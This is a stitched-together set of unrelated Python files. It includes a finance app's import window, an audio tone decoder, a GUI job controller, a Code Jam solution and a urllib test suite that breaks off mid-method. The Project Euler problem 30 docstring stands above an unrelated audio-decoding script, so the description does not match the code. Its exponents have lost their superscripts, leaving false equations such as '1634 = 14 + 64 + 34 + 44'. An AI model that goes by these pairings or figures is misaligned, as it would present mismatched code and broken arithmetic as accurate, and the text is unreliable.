        #echo("= "+sWord+" "+str(dDA.get(nPos, "null")))
    return True


def define (dDA, nPos, lMorph):
    dDA[nPos] = lMorph
    #echo("= "+str(nPos)+" "+str(dDA[nPos]))
    return True


#### GRAMMAR CHECKER PLUGINS

${plugins}


${generated}

# Copyright 2019 Virgil Dupras
#
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html

import datetime
from collections import defaultdict

from core.util import dedupe, first as getfirst
from core.trans import tr

from ..model.date import DateFormat
from .base import GUIObject
from .import_table import ImportTable
from .selectable_list import LinkedSelectableList

DAY = 'day'
MONTH = 'month'
YEAR = 'year'

class SwapType:
    DayMonth = 0
    MonthYear = 1
    DayYear = 2
    DescriptionPayee = 3
    InvertAmount = 4

def last_two_digits(year):
    return year - ((year // 100) * 100)

def swapped_date(date, first, second):
    attrs = {DAY: date.day, MONTH: date.month, YEAR: last_two_digits(date.year)}
    newattrs = {first: attrs[second], second: attrs[first]}
    if YEAR in newattrs:
        newattrs[YEAR] += 2000
    return date.replace(**newattrs)

def swap_format_elements(format, first, second):
    # format is a DateFormat
    swapped = format.copy()
    elems = swapped.elements
    TYPE2CHAR = {DAY: 'd', MONTH: 'M', YEAR: 'y'}
    first_char = TYPE2CHAR[first]
    second_char = TYPE2CHAR[second]
    first_index = [i for i, x in enumerate(elems) if x.startswith(first_char)][0]
    second_index = [i for i, x in enumerate(elems) if x.startswith(second_char)][0]
    elems[first_index], elems[second_index] = elems[second_index], elems[first_index]
    return swapped

class AccountPane:
    def __init__(self, iwin, account, target_account, parsing_date_format):
        self.iwin = iwin
        self.account = account
        self._selected_target = target_account
        self.name = account.name
        entries = iwin.loader.accounts.entries_for_account(account)
        self.count = len(entries)
        self.matches = [] # [[ref, imported]]
        self.parsing_date_format = parsing_date_format
        self.max_day = 31
        self.max_month = 12
        self.max_year = 99 # 2 digits
        self._match_entries()
        self._swap_possibilities = set()
        self._compute_swap_possibilities()

    def _compute_swap_possibilities(self):
        entries = list(self.iwin.loader.accounts.entries_for_account(self.account))
        if not entries:
            return
        self._swap_possibilities = set([(DAY, MONTH), (MONTH, YEAR), (DAY, YEAR)])
        for first, second in self._swap_possibilities.copy():
            for entry in entries:
                try:
                    swapped_date(entry.date, first, second)
                except ValueError:
                    self._swap_possibilities.remove((first, second))
                    break

    def _match_entries(self):
        to_import = list(self.iwin.loader.accounts.entries_for_account(self.account))
        reference2entry = {}
        for entry in (e for e in to_import if e.reference):
            reference2entry[entry.reference] = entry
        self.matches = []
        if self.selected_target is not None:
            entries = self.iwin.document.accounts.entries_for_account(self.selected_target)
            for entry in entries:
                if entry.reference in reference2entry:
                    other = reference2entry[entry.reference]
                    if entry.reconciled:
                        self.iwin.import_table.dont_import.add(other)
                    to_import.remove(other)
                    del reference2entry[entry.reference]
                else:
                    other = None
                if other is not None or not entry.reconciled:
                    self.matches.append([entry, other])
        self.matches += [[None, entry] for entry in to_import]
        self._sort_matches()

    def _sort_matches(self):
        self.matches.sort(key=lambda t: t[0].date if t[0] is not None else t[1].date)

    def bind(self, existing, imported):
        [match1] = [m for m in self.matches if m[0] is existing]
        [match2] = [m for m in self.matches if m[1] is imported]
        assert match1[1] is None
        assert match2[0] is None
        match1[1] = match2[1]
        self.matches.remove(match2)

    def can_swap_date_fields(self, first, second): # 'day', 'month', 'year'
        return (first, second) in self._swap_possibilities or (second, first) in self._swap_possibilities

    def match_entries_by_date_and_amount(self, threshold):
        delta = datetime.timedelta(days=threshold)
        unmatched = (
            to_import for ref, to_import in self.matches if ref is None)
        unmatched_refs = (
            ref for ref, to_import in self.matches if to_import is None)
        amount2refs = defaultdict(list)
        for entry in unmatched_refs:
            amount2refs[entry.amount].append(entry)
        for entry in unmatched:
            if entry.amount not in amount2refs:
                continue
            potentials = amount2refs[entry.amount]
            for ref in potentials:
                if abs(ref.date - entry.date) <= delta:
                    self.bind(ref, entry)
                    potentials.remove(ref)
        self._sort_matches()


    def unbind(self, existing, imported):
        [match] = [m for m in self.matches if m[0] is existing and m[1] is imported]
        match[1] = None
        self.matches.append([None, imported])
        self._sort_matches()

    @property
    def selected_target(self):
        return self._selected_target

    @selected_target.setter
    def selected_target(self, value):
        self._selected_target = value
        self._match_entries()


# This is a modal window that is designed to be re-instantiated on each import
# run. It is shown modally by the UI as soon as its created on the UI side.
class ImportWindow(GUIObject):
    # --- View interface
    # close()
    # close_selected_tab()
    # set_swap_button_enabled(enabled: bool)
    # update_selected_pane()
    # show()
    #

    def __init__(self, mainwindow, target_account=None):
        super().__init__()
        if not hasattr(mainwindow, 'loader'):
            raise ValueError("Nothing to import!")
        self.mainwindow = mainwindow
        self.document = mainwindow.document
        self.app = self.document.app
        self._selected_pane_index = 0
        self._selected_target_index = 0

        def setfunc(index):
            self.view.set_swap_button_enabled(self.can_perform_swap())
        self.swap_type_list = LinkedSelectableList(items=[
            "<placeholder> Day <--> Month",
            "<placeholder> Month <--> Year",
            "<placeholder> Day <--> Year",
            tr("Description <--> Payee"),
            tr("Invert Amounts"),
        ], setfunc=setfunc)
        self.swap_type_list.selected_index = SwapType.DayMonth
        self.panes = []
        self.import_table = ImportTable(self)

        self.loader = self.mainwindow.loader
        self.target_accounts = [
            a for a in self.document.accounts if a.is_balance_sheet_account()]
        self.target_accounts.sort(key=lambda a: a.name.lower())
        accounts = []
        for account in self.loader.accounts:
            if account.is_balance_sheet_account():
                entries = self.loader.accounts.entries_for_account(account)
                if len(entries):
                    new_name = self.document.accounts.new_name(account.name)
                    if new_name != account.name:
                        self.loader.accounts.rename_account(account, new_name)
                    accounts.append(account)
        parsing_date_format = DateFormat.from_sysformat(self.loader.parsing_date_format)
        for account in accounts:
            target = target_account
            if target is None and account.reference:
                target = getfirst(
                    t for t in self.target_accounts if t.reference == account.reference
                )
            self.panes.append(
                AccountPane(self, account, target, parsing_date_format))

    # --- Private
    def _can_swap_date_fields(self, first, second): # 'day', 'month', 'year'
        pane = self.selected_pane
        if pane is None:
            return False
        return pane.can_swap_date_fields(first, second)

    def _invert_amounts(self, apply_to_all):
        if apply_to_all:
            panes = self.panes
        else:
            panes = [self.selected_pane]
        for pane in panes:
            entries = self.loader.accounts.entries_for_account(pane.account)
            txns = dedupe(e.transaction for e in entries)
            for txn in txns:
                for split in txn.splits:
                    split.amount = -split.amount
        self.import_table.refresh()

    def _refresh_target_selection(self):
        if not self.panes:
            return
        target = self.selected_pane.selected_target
        self._selected_target_index = 0
        if target is not None:
            try:
                self._selected_target_index = self.target_accounts.index(target) + 1
            except ValueError:
                pass

    def _refresh_swap_list_items(self):
        if not self.panes:
            return
        items = []
        basefmt = self.selected_pane.parsing_date_format
        for first, second in [(DAY, MONTH), (MONTH, YEAR), (DAY, YEAR)]:
            swapped = swap_format_elements(basefmt, first, second)
            items.append("{} --> {}".format(basefmt.iso_format, swapped.iso_format))
        self.swap_type_list[:3] = items

    def _swap_date_fields(self, first, second, apply_to_all): # 'day', 'month', 'year'
        assert self._can_swap_date_fields(first, second)
        if apply_to_all:
            panes = [p for p in self.panes if p.can_swap_date_fields(first, second)]
        else:
            panes = [self.selected_pane]

        def switch_func(txn):
            txn.date = swapped_date(txn.date, first, second)

        self._swap_fields(panes, switch_func)
        # Now, lets' change the date format on these panes
        for pane in panes:
            basefmt = self.selected_pane.parsing_date_format
            swapped = swap_format_elements(basefmt, first, second)
            pane.parsing_date_format = swapped
            pane._sort_matches()
        self.import_table.refresh()
        self._refresh_swap_list_items()

    def _swap_description_payee(self, apply_to_all):
        if apply_to_all:
            panes = self.panes
        else:
            panes = [self.selected_pane]

        def switch_func(txn):
            txn.description, txn.payee = txn.payee, txn.description

        self._swap_fields(panes, switch_func)

    def _swap_fields(self, panes, switch_func):
        seen = set()
        for pane in panes:
            entries = self.loader.accounts.entries_for_account(pane.account)
            txns = dedupe(e.transaction for e in entries)
            for txn in txns:
                if txn.affected_accounts() & seen:
                    # We've already swapped this txn in a previous pane.
                    continue
                switch_func(txn)
            seen.add(pane.account)
        self.import_table.refresh()

    def _update_selected_pane(self):
        self.import_table.refresh()
        self._refresh_swap_list_items()
        self.view.update_selected_pane()
        self.view.set_swap_button_enabled(self.can_perform_swap())

    # --- Override
    def _view_updated(self):
        if self.document.can_restore_from_prefs():
            self.restore_view()
        # XXX Logically, we should call _update_selected_pane() but doing so
        # make tests fail. to investigate.
        self._refresh_target_selection()
        self.view.update_selected_pane()
        self._refresh_swap_list_items()
        self.import_table.refresh()

    # --- Public
    def can_perform_swap(self):
        index = self.swap_type_list.selected_index
        if index == SwapType.DayMonth:
            return self._can_swap_date_fields(DAY, MONTH)
        elif index == SwapType.MonthYear:
            return self._can_swap_date_fields(MONTH, YEAR)
        elif index == SwapType.DayYear:
            return self._can_swap_date_fields(DAY, YEAR)
        else:
            return True

    def close_pane(self, index):
        was_selected = index == self.selected_pane_index
        del self.panes[index]
        if not self.panes:
            self.view.close()
            return
        self._selected_pane_index = min(self._selected_pane_index, len(self.panes) - 1)
        if was_selected:
            self._update_selected_pane()


    def import_selected_pane(self):
        pane = self.selected_pane
        matches = pane.matches
        matches = [
            (e, ref) for ref, e in matches
            if e is not None and e not in self.import_table.dont_import]
        if pane.selected_target is not None:
            # We import in an existing account, adjust all the transactions accordingly
            target_account = pane.selected_target
        else:
            target_account = None
        self.document.import_entries(target_account, pane.account, matches)
        self.mainwindow.revalidate()
        self.close_pane(self.selected_pane_index)
        self.view.close_selected_tab()

    def match_entries_by_date_and_amount(self, threshold):
        self.selected_pane.match_entries_by_date_and_amount(threshold)
        self.import_table.refresh()

    def perform_swap(self, apply_to_all=False):
        index = self.swap_type_list.selected_index
        if index == SwapType.DayMonth:
            self._swap_date_fields(DAY, MONTH, apply_to_all=apply_to_all)
        elif index == SwapType.MonthYear:
            self._swap_date_fields(MONTH, YEAR, apply_to_all=apply_to_all)
        elif index == SwapType.DayYear:
            self._swap_date_fields(DAY, YEAR, apply_to_all=apply_to_all)
        elif index == SwapType.DescriptionPayee:
            self._swap_description_payee(apply_to_all=apply_to_all)
        elif index == SwapType.InvertAmount:
            self._invert_amounts(apply_to_all=apply_to_all)

    def restore_view(self):
        self.import_table.columns.restore_columns()

    # --- Properties
    @property
    def selected_pane(self):
        return self.panes[self.selected_pane_index] if self.panes else None

    @property
    def selected_pane_index(self):
        return self._selected_pane_index

    @selected_pane_index.setter
    def selected_pane_index(self, value):
        if value >= len(self.panes):
            return
        self._selected_pane_index = value
        self._refresh_target_selection()
        self._update_selected_pane()

    @property
    def selected_target_account(self):
        return self.selected_pane.selected_target

    @property
    def selected_target_account_index(self):
        return self._selected_target_index

    @selected_target_account_index.setter
    def selected_target_account_index(self, value):
        target = self.target_accounts[value - 1] if value > 0 else None
        self.selected_pane.selected_target = target
        self._selected_target_index = value
        self.import_table.refresh()

    @property
    def target_account_names(self):
        return [tr('< New Account >')] + [a.name for a in self.target_accounts]

#!/usr/bin/env python
# coding=utf-8

"""30. Digit fifth powers
https://projecteuler.net/problem=30

Surprisingly there are only three numbers that can be written as the sum of
fourth powers of their digits:

> 1634 = 14 \+ 64 \+ 34 \+ 44  
>  8208 = 84 \+ 24 \+ 04 \+ 84  
>  9474 = 94 \+ 44 \+ 74 \+ 44

As 1 = 14 is not a sum it is not included.

The sum of these numbers is 1634 + 8208 + 9474 = 19316.

Find the sum of all the numbers that can be written as the sum of fifth powers
of their digits.
"""

import sys, math
from test import goertzel
import wave
import pyaudio
import Queue
import numpy as np
if len(sys.argv) < 2:
    print "Usage: %s <filename> " % sys.argv[0]
    sys.exit(1)

filename = sys.argv[1]

w = wave.open(filename)
fs = w.getframerate()
width = w.getsampwidth()
chunkDuration = .2 #.2 second chunks
chunk = int(chunkDuration*fs)
window = np.blackman(chunk)

p = pyaudio.PyAudio()
stream = p.open(format = p.get_format_from_width(w.getsampwidth()), channels = w.getnchannels(),rate = fs, output=True)

#read .2 second chunk
data = w.readframes(chunk)
chunk_data = [] 
#find the frequencies of each chunk

print "Running calculations on wav file"
num = 0 
while data != '':
	print "Calculating Chunk " + str(num)
	stream.write(data)
	indata = np.array(wave.struct.unpack("%dh"%(len(data)/width),\
                                         data))
	freqs , results = goertzel(indata,fs, (1036,1058), (1567,1569), (2082,2104))

	chunk_data.append((freqs,results))
	
	data = w.readframes(chunk)
	num+=.2
stream.close()
p.terminate()

#finished getting data from chunks, now to parse the data

hi = []
lo = []
mid = []

#average first second of audio to get frequency baselines
for i in range (5):
	a = chunk_data[i][0]
	b = chunk_data[i][1]
	for j in range(len(a)):
		if a[j] > 1700:
			hi.append(b[j])
		elif a[j] < 1300:
			lo.append(b[j])
		else:
			mid.append(b[j])

hi_average = sum(hi)/float(len(hi))
lo_average = sum(lo)/float(len(lo))
mid_average = sum(mid)/float(len(mid))


"""
Determine the frequency in each .2 second chunk that has the highest amplitude increase from its average, then determine the frequency 
of that second of data by the median frequency of its 5 chunks
"""



#looks for start signal in last 3 seconds of audio
def signal_found(arr):
	lst = arr[-15:]
	first = 0
	second = 0
	third = 0
	for i in range(0,5):
		if lst[i]=="mid":
			first += 1
	for i in range(5,10):
		if lst[i]=="mid":
			second += 1
	for i in range(10,15):
		if lst[i]=="mid":
			third += 1

	if first >= 5 and second >= 5 and third >= 5:
		return True
	else:
		return False		

#gets freq of 1 second of audio
def get_freq(arr):
	lo_count = 0
	hi_count = 0
	mid_count = 0
	for i in arr:
		if i=="lo":
			lo_count+=1
		if i=="hi":
			hi_count+=1
		if i=="mid":
			mid_count+=1

	if mid_count > hi_count and mid_count > lo_count:
		return 2
		
	if lo_count>hi_count:
		return 0
	else:
		return 1


start = False
freq_list = []
offset = 0
bits = []
for i in range(5,len(chunk_data)):
	a = chunk_data[i][0]
	b = chunk_data[i][1]
	hi_amp = []
	lo_amp = []
	mid_amp = []
	#get averages for each freq
	for j in range(len(a)):
		if a[j] > 1700:
			hi_amp.append(b[j])
		elif a[j] < 1300:
			lo_amp.append(b[j])
		else:
			mid_amp.append(b[j])

	hi_av = sum(hi_amp)/float(len(hi_amp))
	lo_av = sum(lo_amp)/float(len(lo_amp))
	mid_av = sum(mid_amp)/float(len(mid_amp))
	
	#get freq of this chunk
	diff = [lo_av-lo_average,mid_av-mid_average,hi_av-hi_average]
	index = diff.index(max(diff))
	if(index==0):
		freq_list.append("lo")
	if(index==1):
		freq_list.append("mid")
	if(index==2):
		freq_list.append("hi")

	print(freq_list[len(freq_list)-1])	
	if len(freq_list) > 5:
		if start:
			if len(freq_list)%5 == offset:
				bit = get_freq(freq_list[-5:])
				if bit != 2:
					bits.append(bit)
				else:
					print "Stop Signal Detected"
					break
		elif len(freq_list) >= 15:
			if signal_found(freq_list):
				print "signal found"
				start = True
				offset = len(freq_list)%5
			
			
		
print bits 	

from controllers.job_ctrl import JobController
from models.job_model import JobModel
from views.job_view import JobView


class MainController(object):
    def __init__(self, main_model):
        self.main_view = None
        self.main_model = main_model

        self.main_model.begin_job_fetch.connect(self.on_begin_job_fetch)
        self.main_model.update_job_fetch_progress.connect(self.on_job_fetch_update)
        self.main_model.fetched_job.connect(self.on_fetched_job)

    def init_ui(self, main_view):
        self.main_view = main_view
        self.init_hotkeys()

    def init_hotkeys(self):
        self.main_model.hotkey_model.add_hotkey(["Lcontrol", "Lmenu", "J"], self.main_view.focus_job_num_edit)
        self.main_model.hotkey_model.add_hotkey(["Lcontrol", "Lmenu", "O"], self.main_view.open_current_job_folder)
        self.main_model.hotkey_model.add_hotkey(["Lcontrol", "Lmenu", "B"], self.main_view.open_current_job_basecamp)
        self.main_model.hotkey_model.start_detection()

    def fetch_job(self):
        job_num = self.main_view.job_num
        if self.main_model.job_exists(job_num):
            self.main_view.show_job_already_exists_dialog()
            return

        self.main_model.fetch_job(job_num)

    def cancel_job_fetch(self):
        self.main_model.cancel_job_fetch()

    def on_begin_job_fetch(self, max):
        self.main_view.show_job_fetch_progress_dialog(max)

    def on_job_fetch_update(self, progress):
        self.main_view.update_job_fetch_progress_dialog(progress)

    def on_fetched_job(self, job_num, base_folder):
        job = JobModel(job_num,
                       base_folder,
                       self.main_model.settings_model.basecamp_email,
                       self.main_model.settings_model.basecamp_password,
                       self.main_model.settings_model.google_maps_js_api_key,
                       self.main_model.settings_model.google_maps_static_api_key,
                       self.main_model.settings_model.google_earth_exe_path,
                       self.main_model.settings_model.scene_exe_path)
        self.main_model.jobs[job.job_num] = job
        found = bool(job.base_folder)

        self.main_view.close_job_fetch_progress_dialog()

        if not found:
            open_anyway = self.main_view.show_job_not_found_dialog()
            if not open_anyway:
                return
        job_view = JobView(JobController(job))
        job_view.request_minimize.connect(self.main_view.close)
        self.main_view.add_tab(job_view, job.job_name)

    def remove_job(self, index):
        job_num = int(self.main_view.ui.jobs_tab_widget.tabText(index)[1:])
        self.main_model.jobs.pop(job_num, None)
        self.main_view.remove_tab(index)

#!/usr/bin/python
#
# Problem: Making Chess Boards
# Language: Python
# Author: KirarinSnow
# Usage: python thisfile.py <input.in >output.out 


from heapq import *

def process(r1, r2, c1, c2):
    for i in range(r1, r2):
        for j in range(c1, c2):
            if 0 <= i < m and 0 <= j < n:
                if g[i][j] == None:
                    s[i][j] = 0
                elif i == 0 or j == 0:
                    s[i][j] = 1
                elif g[i-1][j] != g[i][j] and g[i][j-1] != g[i][j] and \
                        g[i-1][j-1] == g[i][j]:
                    s[i][j] = 1 + min(s[i-1][j], s[i][j-1], s[i-1][j-1])
                else:
                    s[i][j] = 1
                heappush(q, (-s[i][j], i, j))

def clear(r1, r2, c1, c2):
    for i in range(r1, r2):
        for j in range(c1, c2):
            if 0 <= i < m and 0 <= j < n:
                g[i][j] = None
                
for case in range(int(raw_input())):
    m, n = map(int, raw_input().split())
    v = [eval('0x'+raw_input()) for i in range(m)]
    g = map(lambda x: map(lambda y: (x>>y)%2, range(n)[::-1]), v)
    
    s = [[1 for i in range(n)] for j in range(m)]
    q = []
                                              
    process(0, m, 0, n)

    b = []
    while q:
        x, r, c = heappop(q)
        if x != 0 and s[r][c] == -x:
            b.append((-x, r, c))
            clear(r+x+1, r+1, c+x+1, c+1)
            process(r+x+1, r-x+1, c+x+1, c-x+1)

    vs = sorted(list(set(map(lambda x: x[0], b))))[::-1]
    print "Case #%d: %d" % (case+1, len(vs))
    for k in vs:
        print k, len(filter(lambda x: x[0] == k, b))

from .gaussian_process import RandomFeatureGaussianProcess, mean_field_logits
from .spectral_normalization import SpectralNormalization

import unittest
from test import support

import os
import io
import socket

import urllib.request
from urllib.request import Request, OpenerDirector

# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler

class TrivialTests(unittest.TestCase):
    def test_trivial(self):
        # A couple trivial tests

        self.assertRaises(ValueError, urllib.request.urlopen, 'bogus url')

        # XXX Name hacking to get this to work on Windows.
        fname = os.path.abspath(urllib.request.__file__).replace('\\', '/')

        # And more hacking to get it to work on MacOS. This assumes
        # urllib.pathname2url works, unfortunately...
        if os.name == 'mac':
            fname = '/' + fname.replace(':', '/')

        if os.name == 'nt':
            file_url = "file:///%s" % fname
        else:
            file_url = "file://%s" % fname

        f = urllib.request.urlopen(file_url)

        buf = f.read()
        f.close()

    def test_parse_http_list(self):
        tests = [
            ('a,b,c', ['a', 'b', 'c']),
            ('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
            ('a, b, "c", "d", "e,f", g, h',
             ['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
            ('a="b\\"c", d="e\\,f", g="h\\\\i"',
             ['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
        for string, list in tests:
            self.assertEqual(urllib.request.parse_http_list(string), list)


def test_request_headers_dict():
    """
    The Request.headers dictionary is not a documented interface.  It should
    stay that way, because the complete set of headers are only accessible
    through the .get_header(), .has_header(), .header_items() interface.
    However, .headers pre-dates those methods, and so real code will be using
    the dictionary.

    The introduction in 2.4 of those methods was a mistake for the same reason:
    code that previously saw all (urllib2 user)-provided headers in .headers
    now sees only a subset (and the function interface is ugly and incomplete).
    A better change would have been to replace .headers dict with a dict
    subclass (or UserDict.DictMixin instance?)  that preserved the .headers
    interface and also provided access to the "unredirected" headers.  It's
    probably too late to fix that, though.


    Check .capitalize() case normalization:

    >>> url = "http://example.com"
    >>> Request(url, headers={"Spam-eggs": "blah"}).headers["Spam-eggs"]
    'blah'
    >>> Request(url, headers={"spam-EggS": "blah"}).headers["Spam-eggs"]
    'blah'

    Currently, Request(url, "Spam-eggs").headers["Spam-Eggs"] raises KeyError,
    but that could be changed in future.

    """

def test_request_headers_methods():
    """
    Note the case normalization of header names here, to .capitalize()-case.
    This should be preserved for backwards-compatibility.  (In the HTTP case,
    normalization to .title()-case is done by urllib2 before sending headers to
    http.client).

    >>> url = "http://example.com"
    >>> r = Request(url, headers={"Spam-eggs": "blah"})
    >>> r.has_header("Spam-eggs")
    True
    >>> r.header_items()
    [('Spam-eggs', 'blah')]
    >>> r.add_header("Foo-Bar", "baz")
    >>> items = sorted(r.header_items())
    >>> items
    [('Foo-bar', 'baz'), ('Spam-eggs', 'blah')]

    Note that e.g. r.has_header("spam-EggS") is currently False, and
    r.get_header("spam-EggS") returns None, but that could be changed in
    future.

    >>> r.has_header("Not-there")
    False
    >>> print(r.get_header("Not-there"))
    None
    >>> r.get_header("Not-there", "default")
    'default'

    """


def test_password_manager(self):
    """
    >>> mgr = urllib.request.HTTPPasswordMgr()
    >>> add = mgr.add_password
    >>> add("Some Realm", "http://example.com/", "joe", "password")
    >>> add("Some Realm", "http://example.com/ni", "ni", "ni")
    >>> add("c", "http://example.com/foo", "foo", "ni")
    >>> add("c", "http://example.com/bar", "bar", "nini")
    >>> add("b", "http://example.com/", "first", "blah")
    >>> add("b", "http://example.com/", "second", "spam")
    >>> add("a", "http://example.com", "1", "a")
    >>> add("Some Realm", "http://c.example.com:3128", "3", "c")
    >>> add("Some Realm", "d.example.com", "4", "d")
    >>> add("Some Realm", "e.example.com:3128", "5", "e")

    >>> mgr.find_user_password("Some Realm", "example.com")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/spam")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/spam/spam")
    ('joe', 'password')
    >>> mgr.find_user_password("c", "http://example.com/foo")
    ('foo', 'ni')
    >>> mgr.find_user_password("c", "http://example.com/bar")
    ('bar', 'nini')

    Actually, this is really undefined ATM
##     Currently, we use the highest-level path where more than one match:

##     >>> mgr.find_user_password("Some Realm", "http://example.com/ni")
##     ('joe', 'password')

    Use latest add_password() in case of conflict:

    >>> mgr.find_user_password("b", "http://example.com/")
    ('second', 'spam')

    No special relationship between a.example.com and example.com:

    >>> mgr.find_user_password("a", "http://example.com/")
    ('1', 'a')
    >>> mgr.find_user_password("a", "http://a.example.com/")
    (None, None)

    Ports:

    >>> mgr.find_user_password("Some Realm", "c.example.com")
    (None, None)
    >>> mgr.find_user_password("Some Realm", "c.example.com:3128")
    ('3', 'c')
    >>> mgr.find_user_password("Some Realm", "http://c.example.com:3128")
    ('3', 'c')
    >>> mgr.find_user_password("Some Realm", "d.example.com")
    ('4', 'd')
    >>> mgr.find_user_password("Some Realm", "e.example.com:3128")
    ('5', 'e')

    """
    pass


def test_password_manager_default_port(self):
    """
    >>> mgr = urllib.request.HTTPPasswordMgr()
    >>> add = mgr.add_password

    The point to note here is that we can't guess the default port if there's
    no scheme.  This applies to both add_password and find_user_password.

    >>> add("f", "http://g.example.com:80", "10", "j")
    >>> add("g", "http://h.example.com", "11", "k")
    >>> add("h", "i.example.com:80", "12", "l")
    >>> add("i", "j.example.com", "13", "m")
    >>> mgr.find_user_password("f", "g.example.com:100")
    (None, None)
    >>> mgr.find_user_password("f", "g.example.com:80")
    ('10', 'j')
    >>> mgr.find_user_password("f", "g.example.com")
    (None, None)
    >>> mgr.find_user_password("f", "http://g.example.com:100")
    (None, None)
    >>> mgr.find_user_password("f", "http://g.example.com:80")
    ('10', 'j')
    >>> mgr.find_user_password("f", "http://g.example.com")
    ('10', 'j')
    >>> mgr.find_user_password("g", "h.example.com")
    ('11', 'k')
    >>> mgr.find_user_password("g", "h.example.com:80")
    ('11', 'k')
    >>> mgr.find_user_password("g", "http://h.example.com:80")
    ('11', 'k')
    >>> mgr.find_user_password("h", "i.example.com")
    (None, None)
    >>> mgr.find_user_password("h", "i.example.com:80")
    ('12', 'l')
    >>> mgr.find_user_password("h", "http://i.example.com:80")
    ('12', 'l')
    >>> mgr.find_user_password("i", "j.example.com")
    ('13', 'm')
    >>> mgr.find_user_password("i", "j.example.com:80")
    (None, None)
    >>> mgr.find_user_password("i", "http://j.example.com")
    ('13', 'm')
    >>> mgr.find_user_password("i", "http://j.example.com:80")
    (None, None)

    """

class MockOpener:
    addheaders = []
    def open(self, req, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        self.req, self.data, self.timeout = req, data, timeout
    def error(self, proto, *args):
        self.proto, self.args = proto, args

class MockFile:
    def read(self, count=None): pass
    def readline(self, count=None): pass
    def close(self): pass

class MockHeaders(dict):
    def getheaders(self, name):
        return list(self.values())

class MockResponse(io.StringIO):
    def __init__(self, code, msg, headers, data, url=None):
        io.StringIO.__init__(self, data)
        self.code, self.msg, self.headers, self.url = code, msg, headers, url
    def info(self):
        return self.headers
    def geturl(self):
        return self.url

class MockCookieJar:
    def add_cookie_header(self, request):
        self.ach_req = request
    def extract_cookies(self, response, request):
        self.ec_req, self.ec_r = request, response

class FakeMethod:
    def __init__(self, meth_name, action, handle):
        self.meth_name = meth_name
        self.handle = handle
        self.action = action
    def __call__(self, *args):
        return self.handle(self.meth_name, self.action, *args)

class MockHTTPResponse(io.IOBase):
    def __init__(self, fp, msg, status, reason):
        self.fp = fp
        self.msg = msg
        self.status = status
        self.reason = reason
        self.code = 200

    def read(self):
        return ''

    def info(self):
        return {}

    def geturl(self):
        return self.url


class MockHTTPClass:
    def __init__(self):
        self.level = 0
        self.req_headers = []
        self.data = None
        self.raise_on_endheaders = False
        self._tunnel_headers = {}

    def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        self.host = host
        self.timeout = timeout
        return self

    def set_debuglevel(self, level):
        self.level = level

    def _set_tunnel(self, host, port=None, headers=None):
        self._tunnel_host = host
        self._tunnel_port = port
        if headers:
            self._tunnel_headers = headers
        else:
            self._tunnel_headers.clear()

    def request(self, method, url, body=None, headers=None):
        self.method = method
        self.selector = url
        if headers is not None:
            self.req_headers += headers.items()
        self.req_headers.sort()
        if body:
            self.data = body
        if self.raise_on_endheaders:
            import socket
            raise socket.error()
    def getresponse(self):
        return MockHTTPResponse(MockFile(), {}, 200, "OK")

class MockHandler:
    # useful for testing handler machinery
    # see add_ordered_mock_handlers() docstring
    handler_order = 500
    def __init__(self, methods):
        self._define_methods(methods)
    def _define_methods(self, methods):
        for spec in methods:
            if len(spec) == 2: name, action = spec
            else: name, action = spec, None
            meth = FakeMethod(name, action, self.handle)
            setattr(self.__class__, name, meth)
    def handle(self, fn_name, action, *args, **kwds):
        self.parent.calls.append((self, fn_name, args, kwds))
        if action is None:
            return None
        elif action == "return self":
            return self
        elif action == "return response":
            res = MockResponse(200, "OK", {}, "")
            return res
        elif action == "return request":
            return Request("http://blah/")
        elif action.startswith("error"):
            code = action[action.rfind(" ")+1:]
            try:
                code = int(code)
            except ValueError:
                pass
            res = MockResponse(200, "OK", {}, "")
            return self.parent.error("http", args[0], res, code, "", {})
        elif action == "raise":
            raise urllib.error.URLError("blah")
        assert False
    def close(self): pass
    def add_parent(self, parent):
        self.parent = parent
        self.parent.calls = []
    def __lt__(self, other):
        if not hasattr(other, "handler_order"):
            # No handler_order, leave in original order.  Yuck.
            return True
        return self.handler_order < other.handler_order

def add_ordered_mock_handlers(opener, meth_spec):
    """Create MockHandlers and add them to an OpenerDirector.

    meth_spec: list of lists of tuples and strings defining methods to define
    on handlers.  eg:

    [["http_error", "ftp_open"], ["http_open"]]

    defines methods .http_error() and .ftp_open() on one handler, and
    .http_open() on another.  These methods just record their arguments and
    return None.  Using a tuple instead of a string causes the method to
    perform some action (see MockHandler.handle()), eg:

    [["http_error"], [("http_open", "return request")]]

    defines .http_error() on one handler (which simply returns None), and
    .http_open() on another handler, which returns a Request object.

    """
    handlers = []
    count = 0
    for meths in meth_spec:
        class MockHandlerSubclass(MockHandler): pass
        h = MockHandlerSubclass(meths)
        h.handler_order += count
        h.add_parent(opener)
        count = count + 1
        handlers.append(h)
        opener.add_handler(h)
    return handlers

def build_test_opener(*handler_instances):
    opener = OpenerDirector()
    for h in handler_instances:
        opener.add_handler(h)
    return opener

class MockHTTPHandler(urllib.request.BaseHandler):
    # useful for testing redirections and auth
    # sends supplied headers and code as first response
    # sends 200 OK as second response
    def __init__(self, code, headers):
        self.code = code
        self.headers = headers
        self.reset()
    def reset(self):
        self._count = 0
        self.requests = []
    def http_open(self, req):
        import email, http.client, copy
        from io import StringIO
        self.requests.append(copy.deepcopy(req))
        if self._count == 0:
            self._count = self._count + 1
            name = http.client.responses[self.code]
            msg = email.message_from_string(self.headers)
            return self.parent.error(
                "http", req, MockFile(), self.code, name, msg)
        else:
            self.req = req
            msg = email.message_from_string("\r\n\r\n")
            return MockResponse(200, "OK", msg, "", req.get_full_url())

class MockHTTPSHandler(urllib.request.AbstractHTTPHandler):
    # Useful for testing the Proxy-Authorization request by verifying the
    # properties of httpcon

    def __init__(self):
        urllib.request.AbstractHTTPHandler.__init__(self)
        self.httpconn = MockHTTPClass()

    def https_open(self, req):
